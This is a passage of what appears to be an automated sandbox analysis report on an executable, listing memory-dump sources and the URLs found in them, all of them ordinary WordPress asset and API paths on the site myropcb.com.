                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.11
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F&#038;format=xml
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/wp/v2/pages/28
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 